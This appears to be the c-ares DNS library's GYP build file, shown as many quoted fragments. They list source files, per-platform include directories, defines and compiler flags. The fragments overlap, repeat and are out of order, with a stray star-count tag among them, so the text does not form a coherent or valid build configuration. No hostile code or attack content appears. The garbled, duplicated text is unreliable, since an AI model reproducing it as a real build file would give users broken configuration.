"'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c',",
"{ 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [",
"] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ]",
"[ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [",
"'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c',",
"'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c',",
"'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h',",
"'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c',",
"{ 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [",
"['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', {",
"[ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX 'cflags': [",
"'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin'",
"{ 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', {",
"[ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': {",
"[ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type':",
"for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }]",
"'__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)',",
"<gh_stars>0 { 'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64',",
"'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c',",
"'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ]",
"'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ],",
"'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c',",
"'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"',",
"], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] }",
"], }, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall',",
"'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }],",
"}], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }],",
"'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"',",
"[ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': {",
"'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos'",
"'_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h'",
"'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd'",
"], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h',",
"[ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [",
"'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources':",
"] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [",
"[ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [",
"'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"',",
"'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources':",
"{ 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name':",
"'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ #",
"android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux'",
"'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs':",
"'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c',",
"'_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources':",
"}], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines':",
"'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows",
"'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings':",
"'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ],",
"[ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"',",
"'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c',",
"], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', {",
"'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c',",
"{ 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h',",
"'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib',",
"'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs':",
"'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h'",
"'_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] },",
"'_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ],",
"'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] }",
"'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c',",
"'_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs':",
"Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines':",
"[ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [",
"'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { #",
"], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e. POSIX",
"'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket',",
"}, { # Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra',",
"'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions':",
"'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h',",
"'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c',",
"'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c',",
"'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c',",
"'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h',",
"'HAVE_CONFIG_H' ], }], [ 'OS not in \"win android\"', { 'cflags': [ '--std=gnu89'",
"'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources':",
"{ 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', {",
"'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h'",
"i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H'",
"'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [",
"'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', {",
"[ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [",
"[ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c',",
"'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines':",
"{ 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support",
"[ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix'",
"], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android' ],",
"'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c',",
"'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }],",
"[ # Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__',",
"'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c',",
"], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ],",
"'-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS",
"], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ],",
"'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ] }] ] }, 'targets': [ { 'target_name': 'cares',",
"# Not Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ],",
"'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c',",
"[ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources':",
"'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c',",
"'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [",
"[ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], },",
"[ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY'",
"'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"',",
"[ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"',",
"[ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [",
"'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h',",
"[ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [",
"[ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ]",
"'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c',",
"'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c',",
"'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c', 'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c',",
"'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [",
"'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ] }, 'sources': [",
"'src/lib/ares_create_query.c', 'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c',",
"'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }]",
"'-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not",
"'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h', 'src/lib/ares_mkquery.c',",
"'--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h'",
"Windows i.e. POSIX 'cflags': [ '-g', '-pedantic', '-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [",
"[ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c',",
"'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h', 'src/lib/setup_once.h', 'src/tools/ares_getopt.c', 'src/tools/ares_getopt.h', ], 'conditions': [ [ 'library==\"static_library\"', { 'defines': [",
"Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500' ]",
"'_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c'",
"] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib'",
"'-Wall', '-Wextra', '-Wno-unused-parameter' ], 'defines': [ 'HAVE_CONFIG_H' ], }], [ 'OS not in",
"'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c',",
"[ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ],",
"] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ]",
"[ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [",
"'include', 'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c',",
"'src/lib' ] }, 'sources': [ 'include/ares.h', 'include/ares_dns.h', 'include/ares_rules.h', 'include/ares_version.h', 'src/lib/ares_android.c', 'src/lib/ares_cancel.c', 'src/lib/ares__close_sockets.c', 'src/lib/ares_create_query.c',",
"'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c', 'src/lib/ares__get_hostent.c', 'src/lib/ares_getnameinfo.c', 'src/lib/ares_getsock.c', 'src/lib/ares_init.c', 'src/lib/ares_ipv6.h', 'src/lib/ares_library_init.c', 'src/lib/ares_library_init.h', 'src/lib/ares_llist.c', 'src/lib/ares_llist.h',",
"[ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [",
"'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources': [ 'config/freebsd/ares_config.h' ] }],",
